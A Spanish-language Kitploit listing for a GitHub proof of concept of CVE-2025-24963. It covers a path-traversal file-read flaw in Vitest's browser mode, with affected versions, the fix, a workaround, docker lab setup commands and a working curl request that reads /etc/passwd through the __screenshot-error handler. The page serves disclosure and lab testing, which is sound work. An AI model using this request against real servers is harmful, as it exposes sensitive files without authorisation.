Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24963 | Kitploit
Herramientas/GitHubGitHub/hiteshpatra/cve-2025-24963
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24963 - Modo Navegador de Vitest - Lectura de Archivos Locales

CVE-2025-24963 es una vulnerabilidad de severidad media (puntuación CVSS 3.1: 5.9) que afecta al paquete @vitest/browser, un componente del marco de pruebas Vitest impulsado por Vite. Esta vulnerabilidad surge de una validación de entrada inadecuada en el manejador __screenshot-error del servidor HTTP del modo navegador. Cuando el servidor está expuesto a la red mediante la opción de configuración browser.api.host: true, un atacante puede enviar solicitudes especialmente diseñadas para acceder a archivos arbitrarios en el sistema de archivos del servidor, lo que puede dar lugar a la divulgación no autorizada de información sensible.

Versiones Afectadas

La vulnerabilidad afecta a las siguientes versiones de @vitest/browser:

  • 2.0.4 a 2.1.8
  • 3.0.0 a 3.0.3

Mitigación

Este problema se ha solucionado en las versiones 2.1.9 y 3.0.4. Se recomienda encarecidamente a los usuarios actualizar a estas versiones o posteriores para mitigar la vulnerabilidad.

Solución Alternativa

Si no es posible actualizar de inmediato, una solución alternativa temporal es evitar exponer el servidor del modo navegador a la red, no estableciendo browser.api.host: true en su configuración. Esto impedirá el acceso externo al manejador vulnerable.

Preparar el Entorno

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

Nota: El puerto que utiliza Vitest es dinámico (p. ej., 63315). Es posible que desee supervisar los registros y ajustar el indicador -p en consecuencia.

Explotación

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
Descargar herramienta